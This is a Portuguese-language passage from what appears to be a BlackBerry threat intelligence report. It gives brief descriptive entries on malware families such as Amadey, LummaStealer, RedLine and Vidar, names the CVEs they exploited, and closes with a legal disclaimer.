Amadey (Amadey Bot): Botnet multifuncional que tem um design modular. Uma vez instalado no dispositivo da vítima, o Amadey pode receber comandos de seus servidores C2 para executar várias tarefas, como roubar informações e implantar cargas úteis adicionais.

Buhti: Uma operação de ransomware relativamente nova, o Buhti utiliza variantes das famílias de ransomware LockBit 3.0 (também conhecido como LockBit Black) e Babuk, que vazaram, para atacar sistemas Windows e Linux. Além disso, o Buhti é conhecido por usar um utilitário de exfiltração de dados personalizado, escrito na linguagem de programação "Go", projetado para roubar arquivos com extensões específicas. Os operadores do ransomware também já foram vistos explorando rapidamente outras falhas graves que afetam o aplicativo de troca de arquivos Aspera Faspex da IBM (CVE-2022-47986) e a vulnerabilidade PaperCut recentemente corrigida (CVE-2023-27350).

LummaStealer (LummaC2): Infostealer baseado em C que tem como alvo empresas comerciais e organizações de infraestrutura crítica, com foco na exfiltração de dados privados e confidenciais do dispositivo da vítima. Frequentemente promovido e distribuído por meio de fóruns clandestinos e grupos do Telegram, esse infostealer geralmente depende de cavalos de Troia e spam para se propagar.

PrivateLoader: uma notória família de downloaders que está à solta desde 2021, visando principalmente empresas comerciais na América do Norte. O PrivateLoader (como o próprio nome indica) é um mecanismo de acesso inicial que facilita a implantação de uma infinidade de cargas maliciosas nos dispositivos das vítimas, ou seja, infostealers. O PrivateLoader opera uma rede de distribuição por meio de um serviço clandestino de pagamento por instalação (PPI) para financiar seu uso e desenvolvimento contínuos.

RaccoonStealer: MaaS infostealer. Na natureza desde 2019, os criadores do RaccoonStealer aprimoraram suas habilidades para evitar software de segurança e software AV tradicional. De acordo com a telemetria interna do site BlackBerry, o RaccoonStealer foi observado como alvo de empresas comerciais na América do Norte.

RedLine (RedLine Stealer): Um infostealer de malware amplamente distribuído, geralmente vendido via MaaS. O principal motivo do grupo de ameaças que distribui o malware parece ser principalmente o ganho financeiro, em vez de política, destruição ou espionagem. É por isso que o RedLine tem como alvo ativo uma série de setores e regiões geográficas.

Remcos (RemcosRAT): Um RAT de nível comercial usado para controlar remotamente um computador ou dispositivo. Embora anunciado como software legítimo, o software de controle e vigilância remotos era frequentemente usado como um cavalo de Troia de acesso remoto.

SmokeLoader: Um malware comumente utilizado com uma infinidade de recursos, ou seja, a implantação de outros malwares no dispositivo da vítima. O SmokeLoader tem sido uma ameaça recorrente observada pelo site BlackBerry por meio de vários Relatórios de Inteligência sobre Ameaças Globais. Neste período do relatório, o malware foi visto tendo como alvo serviços comerciais e profissionais na América do Norte.

Vidar (VidarStealer): um sequestrador de informações de commodities que está na natureza desde 2018 e se transformou em uma família de malware altamente armada. Os invasores conseguiram implantar o Vidar explorando vulnerabilidades no popular software ScreenConnect RRM da ConnectWise. Esses dois CVEs, CVE-2024-1708 e CVE-2024-1709, permitiram que os agentes de ameaças contornassem e acessassem sistemas críticos.

Isenção de responsabilidade legal

As informações contidas no Relatório de Inteligência sobre Ameaças Globais do site BlackBerry destinam-se apenas a fins informativos. O site BlackBerry não garante nem se responsabiliza pela precisão, integridade e confiabilidade de quaisquer declarações ou pesquisas de terceiros aqui mencionadas. A análise expressa neste relatório reflete o entendimento atual das informações disponíveis por parte de nossos analistas de pesquisa e pode estar sujeita a alterações à medida que informações adicionais forem divulgadas. Os leitores são responsáveis por exercer sua própria diligência ao aplicar essas informações em suas vidas privadas e profissionais. O site BlackBerry não tolera qualquer uso malicioso ou indevido das informações apresentadas neste relatório.